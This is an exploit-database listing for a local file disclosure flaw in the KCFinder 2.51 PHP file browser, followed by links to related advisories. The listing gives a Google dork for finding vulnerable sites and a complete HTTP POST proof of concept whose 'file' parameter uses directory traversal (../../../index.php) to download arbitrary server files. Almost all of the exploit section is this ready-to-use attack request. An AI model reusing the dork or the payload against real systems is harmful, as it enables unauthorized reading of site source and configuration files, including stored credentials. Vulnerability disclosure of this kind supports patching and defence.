Lucene search
DaOneEDB-ID:27597HistoryAug 15, 2013 - 12:00 a.m.
KCFinder 2.51 - Local File Disclosure
2013-08-1500:00:00
DaOne
www.exploit-db.com
238
AI Score
7.4
Confidence
Low
---------------------------------------------------
# Exploit Title: KCFinder Local File Disclosure
# Author: DaOne
# Vendor Homepage: http://kcfinder.sunhater.com/
# Category: webapps/php
# Version: 2.51 + old versions
# Google dork: inurl:kcfinder/browse.php
---------------------------------------------------
[#] Tested on their own demo...
-PoC-
POST http://server/kcfinder/browse.php?type=images&lng=en&act=download HTTP/1.1
Host: server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
dir=images/Photos+from+Bulgaria&file=../../../index.phpRelated
exploitpack
exploitpack
vTiger CRM 5.4.06.0 RC6.0.0 GA - browse.php Local File Inclusion
2014-03-12 00:00:00
Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities
2015-03-31 00:00:00
prion
prion
Directory traversal
2014-08-12 23:55:00
packetstorm
packetstorm
Vtiger CRM 5.4.0 / 6.0 RC / 6.0.0 GA Local File Inclusion
2014-03-12 00:00:00
FiyoCMS 2.0.1.8 XSS / SQL Injection / URL Bypass
2015-03-30 00:00:00
exploitdb
exploitdb
Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities
2015-03-31 00:00:00
openvas
openvas
vTiger CRM 'file' Arbitrary File Disclosure Vulnerability
2014-08-25 00:00:00
cvelist
cvelist
CVE-2014-1222
2014-08-12 23:00:00
nvd
nvd
CVE-2014-1222
2014-08-12 23:55:03
cve
cve
CVE-2014-1222
2014-08-12 23:55:03
zdt
zdt
Vtiger CRM 5.4.0, 6.0 RC, 6.0.0 GA - Local File Inclusion Vulnerability
2014-03-12 00:00:00
Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities
2015-04-02 00:00:00
seebug
seebug
Vtiger CRM文件包含漏洞
2014-03-13 00:00:00
securityvulns
securityvulns
CVE-2014-1222 - Local File Inclusion in Vtiger CRM
2014-05-05 00:00:00
dsquare
dsquare
vTiger CRM 5.4.0 kcfinder LFI
2014-04-02 00:00:00